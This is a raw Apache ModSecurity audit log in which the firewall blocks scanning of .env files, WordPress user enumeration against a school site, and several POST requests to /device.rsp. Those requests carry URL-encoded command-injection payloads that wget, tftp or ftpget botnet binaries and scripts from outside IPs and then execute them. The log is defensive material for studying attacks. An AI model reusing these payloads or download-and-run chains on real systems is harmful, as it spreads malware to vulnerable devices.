[uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043513530403 638 (- - -) Stopwatch2: 1750043513530403 638; combined=248, p1=216, p2=0, p3=0, p4=0, p5=31, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3198d66-Z-- --dcc2ef29-A-- [16/Jun/2025:10:11:53 +0700] aE-LedPYN2mzu-AuhSOpGwAAABE 103.236.140.4 53066 103.236.140.4 8181 --dcc2ef29-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --dcc2ef29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dcc2ef29-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043513767870 636 (- - -) Stopwatch2: 1750043513767870 636; combined=244, p1=218, p2=0, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dcc2ef29-Z-- --65ee3873-A-- [16/Jun/2025:10:11:54 +0700] aE-LetPYN2mzu-AuhSOpHAAAAAI 103.236.140.4 53068 103.236.140.4 8181 --65ee3873-B-- GET /.env.prod.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --65ee3873-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65ee3873-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043514106285 660 (- - -) Stopwatch2: 1750043514106285 660; combined=257, p1=227, p2=0, p3=0, p4=0, p5=29, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65ee3873-Z-- --88892f00-A-- [16/Jun/2025:10:11:54 +0700] aE-LetPYN2mzu-AuhSOpHQAAAAw 103.236.140.4 53070 103.236.140.4 8181 --88892f00-B-- GET /.env.prod.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --88892f00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88892f00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043514343663 723 (- - -) Stopwatch2: 1750043514343663 723; combined=305, p1=270, p2=0, p3=0, p4=0, p5=35, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88892f00-Z-- --7077f916-A-- [16/Jun/2025:10:11:54 +0700] aE-LetPYN2mzu-AuhSOpHgAAAAs 103.236.140.4 53072 103.236.140.4 8181 --7077f916-B-- GET /.env.production.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --7077f916-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7077f916-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043514682532 632 (- - -) Stopwatch2: 1750043514682532 632; combined=257, p1=223, p2=0, p3=0, p4=0, p5=33, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7077f916-Z-- --d2e24714-A-- [16/Jun/2025:10:11:54 +0700] aE-LetPYN2mzu-AuhSOpHwAAABI 103.236.140.4 53074 103.236.140.4 8181 --d2e24714-B-- GET /.env.production.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --d2e24714-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2e24714-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043514919763 771 (- - -) Stopwatch2: 1750043514919763 771; combined=372, p1=320, p2=0, p3=0, p4=0, p5=52, sr=162, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2e24714-Z-- --9f4dec63-A-- [16/Jun/2025:10:11:55 +0700] aE-Le9PYN2mzu-AuhSOpIAAAAAE 103.236.140.4 53076 103.236.140.4 8181 --9f4dec63-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --9f4dec63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f4dec63-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043515258583 650 (- - -) Stopwatch2: 1750043515258583 650; combined=255, p1=222, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f4dec63-Z-- --b677d841-A-- [16/Jun/2025:10:11:55 +0700] aE-Le9PYN2mzu-AuhSOpIQAAABM 103.236.140.4 53078 103.236.140.4 8181 --b677d841-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --b677d841-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b677d841-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043515495855 667 (- - -) Stopwatch2: 1750043515495855 667; combined=271, p1=225, p2=0, p3=0, p4=0, p5=46, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b677d841-Z-- --dc663658-A-- [16/Jun/2025:10:11:55 +0700] aE-Le9PYN2mzu-AuhSOpIgAAAAQ 103.236.140.4 53080 103.236.140.4 8181 --dc663658-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --dc663658-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc663658-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043515834341 743 (- - -) Stopwatch2: 1750043515834341 743; combined=304, p1=271, p2=0, p3=0, p4=0, p5=33, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc663658-Z-- --ea466d24-A-- [16/Jun/2025:10:11:56 +0700] aE-LfB9AUmrZE8TgO0WEfwAAAFc 103.236.140.4 53082 103.236.140.4 8181 --ea466d24-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --ea466d24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea466d24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043516071894 670 (- - -) Stopwatch2: 1750043516071894 670; combined=247, p1=215, p2=0, p3=0, p4=0, p5=32, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea466d24-Z-- --9ca23069-A-- [16/Jun/2025:10:43:14 +0700] aE-S0h9AUmrZE8TgO0WEgQAAAEw 103.236.140.4 53180 103.236.140.4 8181 --9ca23069-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.150%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 144.172.116.95 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.116.95 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 --9ca23069-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ca23069-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750045394013643 862 (- - -) Stopwatch2: 1750045394013643 862; combined=380, p1=343, p2=0, p3=0, p4=0, p5=37, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ca23069-Z-- --ae711468-A-- [16/Jun/2025:11:07:28 +0700] aE-YgNPYN2mzu-AuhSOphAAAABA 103.236.140.4 53826 103.236.140.4 8181 --ae711468-B-- GET ///wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 209.182.195.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 209.182.195.110 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0 --ae711468-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae711468-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750046848694875 2293 (- - -) Stopwatch2: 1750046848694875 2293; combined=1079, p1=396, p2=642, p3=0, p4=0, p5=41, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae711468-Z-- --b6c7d600-A-- [16/Jun/2025:11:16:07 +0700] aE-ah9PYN2mzu-AuhSOpjgAAAAs 103.236.140.4 53890 103.236.140.4 8181 --b6c7d600-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3B%20wget%20http%3A%2F%2F104.167.221.114%2Ftbkdvr.sh%3B%20chmod%20777%20tbkdvr.sh%3B%20sh%20tbkdvr.sh%3B%20tftp%20104.167.221.114%20-c%20get%20tbkdvr1.sh%3B%20chmod%20777%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20tftp%20-r%20tbkdvr2.sh%20-g%20104.167.221.114%3B%20chmod%20777%20tbkdvr2.sh%3B%20sh%20tbkdvr2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20104.167.221.114%20tbkdvr1.sh%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20rm%20-rf%20tbkdvr.sh%20tbkdvr1.sh%20tbkdvr2.sh%20tbkdvr1.sh HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 104.167.221.114 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.167.221.114 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --b6c7d600-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6c7d600-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750047367595227 999 (- - -) Stopwatch2: 1750047367595227 999; combined=417, p1=380, p2=0, p3=0, p4=0, p5=37, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6c7d600-Z-- --d6a6f277-A-- [16/Jun/2025:11:36:02 +0700] aE-fMi-4qihuRDlKQ4l5QAAAAMI 103.236.140.4 54044 103.236.140.4 8181 --d6a6f277-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.111.234.35 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.111.234.35 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d6a6f277-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6a6f277-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750048562263810 3373 (- - -) Stopwatch2: 1750048562263810 3373; combined=1480, p1=529, p2=915, p3=0, p4=0, p5=36, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6a6f277-Z-- --38a8c76d-A-- [16/Jun/2025:12:28:32 +0700] aE-rgGf-_Obc6SnO-jx4HgAAAJc 103.236.140.4 54812 103.236.140.4 8181 --38a8c76d-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3B%20wget%20http%3A%2F%2F104.167.221.114%2Ftbkdvr.sh%3B%20chmod%20777%20tbkdvr.sh%3B%20sh%20tbkdvr.sh%3B%20tftp%20104.167.221.114%20-c%20get%20tbkdvr1.sh%3B%20chmod%20777%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20tftp%20-r%20tbkdvr2.sh%20-g%20104.167.221.114%3B%20chmod%20777%20tbkdvr2.sh%3B%20sh%20tbkdvr2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20104.167.221.114%20tbkdvr1.sh%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20rm%20-rf%20tbkdvr.sh%20tbkdvr1.sh%20tbkdvr2.sh%20tbkdvr1.sh HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 104.167.221.114 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.167.221.114 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --38a8c76d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38a8c76d-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750051712843615 943 (- - -) Stopwatch2: 1750051712843615 943; combined=423, p1=376, p2=0, p3=0, p4=0, p5=47, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38a8c76d-Z--